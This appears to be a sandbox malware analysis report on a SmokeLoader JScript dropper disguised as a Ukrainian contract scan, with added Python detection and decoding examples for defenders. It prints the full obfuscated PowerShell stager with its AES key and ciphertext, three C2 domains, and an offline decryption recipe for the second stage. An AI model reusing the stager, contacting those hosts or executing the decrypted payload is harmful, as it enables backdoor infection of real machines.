Windows Analysis Report
Скан-копiя Договiр.js
Overview
General Information
Field | Value
---|---
Sample name (as stored by the sandbox) | #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.js
Sample name (decoded) | Скан-копiя Договiр.js (Ukrainian, "Scan copy Contract.js"). The sandbox escapes non-ASCII characters in file names as #Uxxxx; note that the "i" in копiя and Договiр is the Latin letter (U+0069), not the Cyrillic і (U+0456).
Analysis ID | 1577215
MD5 | f0f21a53585ee70adbe6004636da53f4
SHA1 | 8123ab7729d5c1a339af4e5f6c93b68e1acdfaf4
SHA256 | 292bda20c71cc52f49c84f40160d5747ed2c6ab24ce7a027d2808888438b93a6
Detection

Field | Value
---|---
Family | SmokeLoader
Score | 100 (range 0 - 100)
Whitelisted | false
Confidence | 100%
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
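Several of the signatures above are plain process-creation rules: the Sigma matches "WScript or CScript Dropper", "Change PowerShell Policies to an Insecure Level" and "WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript", together with "Very long command line found" and "Drops files with a non-matching file extension". The Python below is an added example (not Joe Sandbox's signature code and not the Sigma rules themselves) that expresses those checks as rules over Sysmon-style process events and adds one cross-event check for the same MD5 appearing under two file names. The events are constructed from the process tree in this report: images, PIDs and MD5s are the reported ones, while the parent links for Acrobat.exe and putty.exe, the stand-in for the hex blob, the notepad.exe control event and the 1000-character length threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events modelled on the process tree in
# this report: images, PIDs and MD5s are the reported ones; the parent links for
# Acrobat.exe and putty.exe, the stand-in for the 1760-character hex blob and the
# benign notepad.exe event are assumptions added to exercise the rules.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\WScript.exe"
EXPLORER = r"C:\Windows\Explorer.EXE"
ROAMING = r"C:\Users\user\AppData\Roaming"
EVENTS = [
    {"pid": 5512, "image": WSCRIPT, "parent": EXPLORER,
     "cmdline": WSCRIPT + r' "C:\Users\user\Desktop\Скан-копiя Договiр.js"',
     "md5": "A47CBE969EA935BDD3AB568BB126BC80"},
    {"pid": 4540, "image": PS, "parent": WSCRIPT,
     "cmdline": '"' + PS + "\" -w 1 -ep Unrestricted -nop function YYjd($AhlAc){...};"
                "$KPwC = YYjd('" + "9626AC9CA1" * 176 + "');...",  # blob length stand-in
     "md5": "04029E121A0CFA5991749937DD22A1D9"},
    {"pid": 7288, "image": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe", "parent": PS,
     "cmdline": r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "' + ROAMING + r'\invoce.pdf"',
     "md5": "24EAD1C46A47022347DC0F05F6EFBB8C"},
    {"pid": 8072, "image": ROAMING + r"\putty.exe", "parent": PS,
     "cmdline": '"' + ROAMING + r'\putty.exe"', "md5": "C09AA26230A2083DA9032866FD33703D"},
    {"pid": 4252, "image": ROAMING + r"\therfaa", "parent": EXPLORER,
     "cmdline": ROAMING + r"\therfaa", "md5": "C09AA26230A2083DA9032866FD33703D"},
    {"pid": 6100, "image": r"C:\Windows\System32\notepad.exe", "parent": EXPLORER,
     "cmdline": "notepad.exe", "md5": "00000000000000000000000000000000"},  # assumed benign control
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOC_VIEWERS = {"acrobat.exe", "acrord32.exe", "winword.exe", "excel.exe"}
# -ep / -ex / -ExecutionPolicy followed by an insecure level (PowerShell accepts abbreviations).
INSECURE_POLICY = re.compile(r"-(?:ep|ex\w*)\s+(?:unrestricted|bypass)\b", re.I)
LONG_CMDLINE = 1000  # assumed threshold; tune to the environment's baseline


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events) -> list:
    """Return sorted (pid, rule) pairs for every rule each event trips."""
    hits = set()
    for e in events:
        pid, img, parent, cmd = e["pid"], basename(e["image"]), basename(e["parent"]), e["cmdline"]
        # Sigma "WScript or CScript Dropper" / "Wscript starts Powershell": script host -> powershell.
        if parent in SCRIPT_HOSTS and img == "powershell.exe":
            hits.add((pid, "script_host_spawns_powershell"))
        # Sigma "Change PowerShell Policies to an Insecure Level".
        if img == "powershell.exe" and INSECURE_POLICY.search(cmd):
            hits.add((pid, "insecure_execution_policy"))
        # "Very long command line found": the stager carries an 880-byte ciphertext as hex.
        if len(cmd) > LONG_CMDLINE:
            hits.add((pid, "very_long_command_line"))
        # A document viewer launched by PowerShell is the decoy (invoce.pdf) being shown.
        if parent == "powershell.exe" and img in DOC_VIEWERS:
            hits.add((pid, "decoy_document_from_powershell"))
        # Payloads staged under %APPDATA%\Roaming (putty.exe, therfaa).
        if "\\appdata\\roaming\\" in e["image"].lower():
            hits.add((pid, "execution_from_appdata"))
        # "Drops files with a non-matching file extension": an executable image with no extension.
        if "." not in img:
            hits.add((pid, "extensionless_image"))
    # Cross-event rule: one MD5 under several names (the report lists putty.exe and
    # therfaa with identical hashes, i.e. the same file under a second name).
    names_by_hash = defaultdict(set)
    for e in events:
        names_by_hash[e["md5"]].add(basename(e["image"]))
    for e in events:
        if len(names_by_hash[e["md5"]]) > 1:
            hits.add((e["pid"], "same_hash_multiple_names"))
    return sorted(hits)


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(pid, rule)
```

The hash rule is the one worth keeping even when the others are too noisy for a given estate: a renamed copy of a just-executed binary in the user profile is rarely legitimate, and it needs no string matching on an obfuscated command line.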
Classification
- System is w10x64
- wscript.exe (PID: 5512, MD5: A47CBE969EA935BDD3AB568BB126BC80)
  cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Скан-копiя Договiр.js"
- powershell.exe (PID: 4540, MD5: 04029E121A0CFA5991749937DD22A1D9)
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function YYjd($AhlAc){return -split ($AhlAc -replace '..', '0x$& ')};$KPwC = YYjd('9626AC9CA11F87600DA3D4D6512002C7DBD2692A7FD524BB4FD120B8703E62B78823EC832238DD1518E4463172663BB7581F6638A4DB36633FD4587EACB1F6E92783B536B0033981A9BBB7B3820BBB662B2DEEBB46C45FDA20758EFD8966EE737A4FFE51B0B05B720AD71E578EF1CDD1C5D079B0871D75CA28175427ED824C17AE205EB3D16B2CB56DBE2EEF7CD9B26A80A26195C5A4212C391BE6FA8471B32E1FECC1A8AB39510DC769DFF298CAF994FD115AC6D93557D0C2ADC21BEA849D901B562C394F376197052590BA05267E31E9F7A737740706C07FEB1A99508B4DAB29313E96415058C85F28827900D80E5D145B64CD02FCD51C7880852E1C4DFBF891DC5482A7B37E5BD8C81C2DFC9FCD49AE7D7055FCA9A57228762073D80AB71A7A99E8E21A8BE8B7B66C00A9D1192A801A2D026D3D7D5C22467949B4555D9370AA40B4FA9A3A2BA54F4DC8CEF827955BA500A1F5547EC70CBB8F8B0ED68FCF3402F7E74AE0A1912A6903222DB9BB5BA07AC2CC865B4770BFEB2AE1929DDA9E6F2B18934C8790DBC2A20E2617C410434BC21BC5EC2FACED22799A39CEDE8A16C040DA945AC83B21A48D1EF157A3FF92A7B4C17B44BFBF9361306729775078D6ABF1025EC18617C0409B64FC7A378CD9EFC0B2EB21A213221986A49AD0D6E7B08210CF163B19B73128352A80894F065CDC9B095DB8513360C157D95D4AD51DA58BDC71AAFA4E8F8BBD2A07BE25F3E32A4D5337B04B3C8D8E8855946E1D6B0C403E07B4E3B937C6615DE848917188BD1DCE38F70A40CDA365782300D6E5D5EED0DAA2C5C600F3366672239898766852527C4283B3DA965F9A86F861214192089A34C1CE5380EE7D6E0F386E744119906B947C7758BB4D7B8A325C60653292B6C08C97385DDC4F7F5AB31EAE51E4F906F9D17C398E252EEA05547754176EF723FDBD120525A42AC182E5EB4B575DBBFA9C5A468028141761CEEC0A3225665EF3C6B84622C514A2DCA8516179C4F22D4B9C04F7856080B6F50F14FFCACC0D37A5DCB8B05A861748AA499BE5ADBAEF60DAA641DC3547F92E711E7D70DF4FF551B3D81D829F09839D1E7B12264274B34EC2BB736771ED9B7D5B2DD00090DFE4C97D6C7684F6B2274906AFDB0357F7F48B7B50440E3B5A6FF709B7581916322D76ED40C49674645626922643643DD0E89524AD1811687A9C7C8A93CDD6C520CFCDF968742122C005D2F8128AD8A2FAB7F5D8FE45');$ajka=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((YYjd('514E694141537749566378795955644F')),[byte[]]::new(16)).TransformFinalBlock($KPwC,0,$KPwC.Length)); & $ajka.Substring(0,3) $ajka.Substring(3)
  What this stager does: -w 1 hides the window, -ep Unrestricted disables the execution policy and -nop skips profiles. YYjd turns a hex string into a byte array (each pair becomes "0xNN", then -split produces the array). The 1760-character literal is an 880-byte ciphertext; it is decrypted with .NET Aes.Create(), which defaults to CBC mode with PKCS7 padding, using the 16-byte key 514E694141537749566378795955644F (ASCII "QNiAASwIVcxyYUdO") and an all-zero IV ([byte[]]::new(16)). The plaintext is then executed with the call operator: its first three characters are used as the command name and the rest as the argument. The decrypted content is not shown in this report.
- conhost.exe (PID: 1388, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Acrobat.exe (PID: 7288, MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
  cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\invoce.pdf"
- AcroCEF.exe (PID: 7460, MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
- AcroCEF.exe (PID: 7720, MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1740,i,7611697812648605537,3973104547024125911,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
- putty.exe (PID: 8072, MD5: C09AA26230A2083DA9032866FD33703D)
  cmdline: "C:\Users\user\AppData\Roaming\putty.exe"
- explorer.exe (PID: 2592, MD5: 662F4F92FDE3557E86D110526BB578D5)
  cmdline: C:\Windows\Explorer.EXE
- svchost.exe (PID: 7540, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
- therfaa (PID: 4252, MD5: C09AA26230A2083DA9032866FD33703D, identical to putty.exe)
  cmdline: C:\Users\user\AppData\Roaming\therfaa
- cleanup
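The PowerShell stager in the process tree above is obfuscated but not packed: the first YYjd argument is the ciphertext, the second (inside CreateDecryptor) is the 16-byte key, [byte[]]::new(16) is an all-zero IV, and Aes.Create() defaults to CBC with PKCS7 padding. The Python below is an added example, not code from the report or from the malware; it re-implements the YYjd conversion, pulls those parameters out of the command line without evaluating any of it, and emits an openssl command plus a defanged copy of the stager. STAGER is the reported command line with the 880-byte ciphertext shortened to its first and last blocks (the full 1760-character literal is in the process tree); the file names stage2.bin and stage2.ps1 are placeholders.

```python
import re

# Constructed input: the stager command line from the process tree, with the
# 1760-hex-character ciphertext cut down to its first and last 16-byte blocks so the
# snippet stays short. Function name, key literal, zero IV and the final call are
# exactly as the report shows them.
STAGER = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -w 1 -ep Unrestricted -nop '
    "function YYjd($AhlAc){return -split ($AhlAc -replace '..', '0x$& ')};"
    "$KPwC = YYjd('9626AC9CA11F87600DA3D4D6512002C72122C005D2F8128AD8A2FAB7F5D8FE45');"
    "$ajka=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor("
    "(YYjd('514E694141537749566378795955644F')),[byte[]]::new(16))"
    ".TransformFinalBlock($KPwC,0,$KPwC.Length)); & $ajka.Substring(0,3) $ajka.Substring(3)"
)

# The execution idiom: first three plaintext chars as command, remainder as argument.
EXEC_CALL = re.compile(r"& \$(\w+)\.Substring\(0,3\) \$\1\.Substring\(3\)")


def yyjd(hex_text: str) -> bytes:
    """Python twin of the stager's YYjd helper.

    PowerShell's  -replace '..', '0x$& '  rewrites every two characters as "0xNN ",
    and -split turns that into an array of strings that PowerShell coerces to bytes
    when it lands in a byte[] parameter. Reproducing it literally (rather than using
    bytes.fromhex) keeps the same failure mode: a pair that is not hex makes int()
    raise ValueError instead of quietly producing a different buffer.
    """
    tokens = re.sub(r"..", lambda m: "0x" + m.group(0) + " ", hex_text).split()
    return bytes(int(tok, 16) for tok in tokens)


def parse_stager(cmdline: str) -> dict:
    """Recover the AES parameters and the execution shape without running anything."""
    # The stager calls YYjd on exactly two hex literals: the ciphertext first and,
    # nested inside CreateDecryptor(...), the key.
    literals = re.findall(r"YYjd\('([0-9A-Fa-f]+)'\)", cmdline)
    if len(literals) != 2:
        raise ValueError(f"expected two YYjd hex literals, found {len(literals)}")
    ciphertext, key = yyjd(literals[0]), yyjd(literals[1])
    if len(ciphertext) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    # [byte[]]::new(16) is sixteen zero bytes; Aes.Create() defaults to CBC with
    # PKCS7 padding, so the decryptor is AES-<keybits>-CBC, key as given, IV = 0.
    return {
        "algorithm": f"AES-{len(key) * 8}-CBC",
        "key": key,
        "key_ascii": key.decode("ascii", errors="replace"),
        "iv": bytes(16),
        "ciphertext": ciphertext,
        "executes_plaintext": EXEC_CALL.search(cmdline) is not None,
        "evasion_flags": sorted(f for f in ("-w 1", "-ep Unrestricted", "-nop") if f in cmdline),
    }


def openssl_recipe(info: dict, ciphertext_path: str = "stage2.bin") -> str:
    """openssl one-liner to decrypt offline once the full ciphertext is in a file."""
    return (f"openssl enc -d -aes-{len(info['key']) * 8}-cbc -K {info['key'].hex()} "
            f"-iv {info['iv'].hex()} -in {ciphertext_path} -out stage2.ps1")


def defanged(cmdline: str) -> str:
    """Swap the call operator for Write-Output so the plaintext is printed, not executed."""
    return EXEC_CALL.sub(r"Write-Output $\1", cmdline)


if __name__ == "__main__":
    info = parse_stager(STAGER)
    print(info["algorithm"], "key =", info["key_ascii"], "iv =", info["iv"].hex())
    print(len(info["ciphertext"]), "ciphertext bytes here; 880 in the reported sample")
    print(openssl_recipe(info))
    print(defanged(STAGER))
```

The report does not show the decrypted script, so the block stops at producing the recipe. To use it on the real sample, write the full hex literal from the process tree to stage2.bin as raw bytes (for example with xxd -r -p) and run the printed openssl command; the truncated STAGER here will not decrypt to anything meaningful. The defanged copy still runs the decryption, so execute it only in an isolated Windows VM.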
Malware family

SmokeLoader: a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. It is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.

Extracted malware configuration:
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
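The family description above gives the network tell to hunt for: cover traffic to legitimate domains, and a real download that answers 404 yet carries a body. The Python below is an added example (not from the report) that applies that observation, together with the extracted C2 list, to a proxy log; the log lines are constructed for the demonstration, and treating a POST that 404s with a non-empty body as the signal (rather than any 404 with a body, which would match every custom error page) is the author's choice.

```python
import json
from urllib.parse import urlparse

# Extracted configuration exactly as shown in this report.
CONFIG = json.loads('{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", '
                    '"http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}')

# Constructed proxy log (not from the report):
# time host method path status response_bytes user_agent
PROXY_LOG = """\
2024-12-20T10:00:01Z www.microsoft.com GET / 200 5120 Mozilla/5.0
2024-12-20T10:00:02Z constractionscity1991.lat POST / 404 342 Mozilla/5.0
2024-12-20T10:00:03Z restructurisationservice.ru POST / 404 0 -
2024-12-20T10:00:04Z example.org GET /missing 404 2210 Mozilla/5.0
2024-12-20T10:00:05Z connecticutproperty.ru POST / 200 8192 -
"""


def c2_hosts(config: dict) -> set:
    """Hostnames from the config's C2 URLs, lower-cased for matching."""
    return {urlparse(url).hostname.lower() for url in config["C2 list"]}


def triage(log_text: str, config: dict) -> list:
    """Return (timestamp, host, [reasons]) for each request that trips a rule."""
    known = c2_hosts(config)
    findings = []
    for line in log_text.splitlines():
        ts, host, method, path, status, size, ua = line.split(None, 6)
        reasons = []
        if host.lower() in known:
            reasons.append("known_c2_host")
        # The real download is a 404 whose body carries the payload. Only POSTs are
        # considered: a GET that 404s with a body is usually just a custom error page.
        if method == "POST" and status == "404" and int(size) > 0:
            reasons.append("post_404_with_body")
        # Matches the report's "HTTP GET or POST without a user agent" signature.
        if ua == "-":
            reasons.append("no_user_agent")
        if reasons:
            findings.append((ts, host, reasons))
    return findings


if __name__ == "__main__":
    for ts, host, reasons in triage(PROXY_LOG, CONFIG):
        print(ts, host, ", ".join(reasons))
```

The host match is the strong signal while this configuration is current; the other two rules are what keeps the detection alive after the C2 list rotates.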
Yara matches

Rule | Description | Author
---|---|---
Windows_Trojan_Smokeloader_3687686f | unknown | unknown
Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

Each rule matched more than once.
Sigma matches (System Summary), by rule author:
- Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
- frack113